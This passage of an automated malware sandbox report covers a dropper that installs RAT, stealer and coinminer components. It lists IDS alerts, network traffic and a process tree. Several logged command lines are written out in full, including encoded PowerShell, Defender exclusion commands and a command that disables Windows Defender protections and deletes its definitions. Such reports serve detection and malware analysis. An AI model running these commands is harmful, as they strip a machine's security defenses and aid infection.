                                                                                                                                                                              .text0x20000x15472440x15474007e62e6fa2f94df65ce7212e2aa8064c4unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rsrc0x154a0000x5780x60045d07ab1acc40cbf1762eb982c9781e9False0.4049479166666667data4.24040352921975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .reloc0x154c0000xc0x20031ab67373496515d128e65a56f4c65bbFalse0.044921875data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_VERSION0x154a0a00x22cdata0.4676258992805755
                                                                                                                                                                              RT_MANIFEST0x154a2d00x2a2XML 1.0 document, ASCII text0.4732937685459941
                                                                                                                                                                              DLLImport
                                                                                                                                                                              mscoree.dll_CorExeMain
                                                                                                                                                                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                                                                                                              2024-08-01T10:57:10.753831+0200TCP2826930ETPRO COINMINER XMR CoinMiner Usage49748443192.168.2.445.76.89.70
                                                                                                                                                                              2024-08-01T10:58:33.850462+0200TCP2048130ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)4974580192.168.2.4194.58.42.154
                                                                                                                                                                              2024-08-01T10:58:09.528507+0200UDP2036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)5579353192.168.2.41.1.1.1
                                                                                                                                                                              2024-08-01T10:57:57.535717+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)4974580192.168.2.4194.58.42.154
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Aug 1, 2024 10:57:09.990937948 CEST49730443192.168.2.4162.159.130.234
                                                                                                                                                                              Aug 1, 2024 10:57:09.990991116 CEST44349730162.159.130.234192.168.2.4
                                                                                                                                                                              Aug 1, 2024 10:57:09.991106033 CEST49730443192.168.2.4162.159.130.234
                                                                                                                                                                              Aug 1, 2024 10:57:10.008022070 CEST49730443192.168.2.4162.159.130.234
                                                                                                                                                                              Aug 1, 2024 10:57:10.008042097 CEST44349730162.159.130.234192.168.2.4
                                                                                                                                                                              Aug 1, 2024 10:57:10.537710905 CEST44349730162.159.130.234192.168.2.4
                                                                                                                                                                              Aug 1, 2024 10:57:10.538017988 CEST49730443192.168.2.4162.159.130.234
                                                                                                                                                                              Aug 1, 2024 10:57:10.624789000 CEST49730443192.168.2.4162.159.130.234
                                                                                                                                                                              Aug 1, 2024 10:57:10.624824047 CEST44349730162.159.130.234192.168.2.4
                                                                                                                                                                              Aug 1, 2024 10:57:10.625900030 CEST44349730162.159.130.234192.168.2.4
                                                                                                                                                                              Aug 1, 2024 10:57:10.676357031 CEST49730443192.168.2.4162.159.130.234
                                                                                                                                                                              Aug 1, 2024 10:57:10.753555059 CEST49730443192.168.2.4162.159.130.234
                                                                                                                                                                              Aug 1, 2024 10:57:10.800506115 CEST44349730162.159.130.234192.168.2.4
                                                                                                                                                                              Aug 1, 2024 10:57:10.882524967 CEST44349730162.159.130.234192.168.2.4
                                                                                                                                                                              Aug 1, 2024 10:57:10.882680893 CEST44349730162.159.130.234192.168.2.4
                                                                                                                                                                              Aug 1, 2024 10:57:10.883514881 CEST49730443192.168.2.4162.159.130.234
                                                                                                                                                                              Aug 1, 2024 10:57:10.916800022 CEST49730443192.168.2.4162.159.130.234
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Aug 1, 2024 10:57:09.968135118 CEST5658853192.168.2.41.1.1.1
                                                                                                                                                                              Aug 1, 2024 10:57:09.976161003 CEST53565881.1.1.1192.168.2.4
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Aug 1, 2024 10:57:09.968135118 CEST192.168.2.41.1.1.10x6f9fStandard query (0)gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Aug 1, 2024 10:57:09.976161003 CEST1.1.1.1192.168.2.40x6f9fNo error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                              Aug 1, 2024 10:57:09.976161003 CEST1.1.1.1192.168.2.40x6f9fNo error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                              Aug 1, 2024 10:57:09.976161003 CEST1.1.1.1192.168.2.40x6f9fNo error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                              Aug 1, 2024 10:57:09.976161003 CEST1.1.1.1192.168.2.40x6f9fNo error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                              Aug 1, 2024 10:57:09.976161003 CEST1.1.1.1192.168.2.40x6f9fNo error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                              • gateway.discord.gg
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.449730162.159.130.2344437176C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-08-01 08:57:10 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                                                                                                                                                              Connection: Upgrade,Keep-Alive
                                                                                                                                                                              Upgrade: websocket
                                                                                                                                                                              Sec-WebSocket-Key: pEXqwa4GxwmcjiDtvHZVTg==
                                                                                                                                                                              Sec-WebSocket-Version: 13
                                                                                                                                                                              Host: gateway.discord.gg
                                                                                                                                                                              2024-08-01 08:57:10 UTC618INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 01 Aug 2024 08:57:10 GMT
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVLozOVy8Fk7BeFX7Ni1ydTRST3KHWMMR6MKVKasifwnv77VhA3Mtg5hFW0%2BtQH%2FVCmRtOxyPuvwp16IuVQL6HaAhwEALnKbf21QvYxv%2BEspwbzB1ljE%2FRv%2FZInw1sYeLWOG5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ac49e828eb841ed-EWR


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:04:57:05
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\87Bym0x4Fy.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\87Bym0x4Fy.exe"
                                                                                                                                                                              Imagebase:0x60000
                                                                                                                                                                              File size:22'314'496 bytes
                                                                                                                                                                              MD5 hash:7AA4185295AB3F4F896704AED05C0795
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:04:57:06
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="
                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:04:57:06
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:04:57:07
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="
                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:04:57:07
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:04:57:08
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                              Imagebase:0x7ff72b050000
                                                                                                                                                                              File size:22'224'360 bytes
                                                                                                                                                                              MD5 hash:A83964F260C28614DA067F6B3DF9E044
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:04:57:08
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe"
                                                                                                                                                                              Imagebase:0x2227b640000
                                                                                                                                                                              File size:80'896 bytes
                                                                                                                                                                              MD5 hash:95AF6E5D52A57515DC2E638C419F50D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:04:57:09
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                              Imagebase:0x7ff72b050000
                                                                                                                                                                              File size:22'224'360 bytes
                                                                                                                                                                              MD5 hash:A83964F260C28614DA067F6B3DF9E044
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:04:57:10
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:04:57:10
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176
                                                                                                                                                                              Imagebase:0x7ff7aa760000
                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:04:57:10
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308
                                                                                                                                                                              Imagebase:0x7ff7aa760000
                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:04:57:11
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:04:57:11
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:13
                                                                                                                                                                              Start time:04:57:12
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
                                                                                                                                                                              Imagebase:0xb40000
                                                                                                                                                                              File size:17'874'291 bytes
                                                                                                                                                                              MD5 hash:A4FE53D7F7F29D0065F8B589A7B61112
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 58%, ReversingLabs
                                                                                                                                                                              • Detection: 51%, Virustotal, Browse
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:04:57:15
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                                                                                                              Imagebase:0x7ff6d55d0000
                                                                                                                                                                              File size:11'662'615 bytes
                                                                                                                                                                              MD5 hash:FC445049713C02F9A9DDAA62E404C9E9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 71%, ReversingLabs
                                                                                                                                                                              • Detection: 62%, Virustotal, Browse
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:04:57:15
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                                                                                                              Imagebase:0x7ff601510000
                                                                                                                                                                              File size:6'171'507 bytes
                                                                                                                                                                              MD5 hash:10D45FBCAC1C3CCF126754680E91E0E2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000010.00000003.1795412848.0000014703693000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000010.00000003.1795412848.0000014703695000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 51%, ReversingLabs
                                                                                                                                                                              • Detection: 47%, Virustotal, Browse
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:04:57:16
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                                                                                                              Imagebase:0x7ff601510000
                                                                                                                                                                              File size:6'171'507 bytes
                                                                                                                                                                              MD5 hash:10D45FBCAC1C3CCF126754680E91E0E2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:18
                                                                                                                                                                              Start time:04:57:17
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                                                                                                              Imagebase:0x7ff6d55d0000
                                                                                                                                                                              File size:11'662'615 bytes
                                                                                                                                                                              MD5 hash:FC445049713C02F9A9DDAA62E404C9E9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:04:57:18
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:20
                                                                                                                                                                              Start time:04:57:18
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:21
                                                                                                                                                                              Start time:04:57:18
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
                                                                                                                                                                              Imagebase:0x550000
                                                                                                                                                                              File size:6'361'390 bytes
                                                                                                                                                                              MD5 hash:E5DB23B3AAF4DDDD2BAF96FB7BBA9616
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:22
                                                                                                                                                                              Start time:04:57:20
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:23
                                                                                                                                                                              Start time:04:57:20
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:04:57:20
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:25
                                                                                                                                                                              Start time:04:57:20
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:26
                                                                                                                                                                              Start time:04:57:20
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:27
                                                                                                                                                                              Start time:04:57:20
                                                                                                                                                                              Start date:01/08/2024
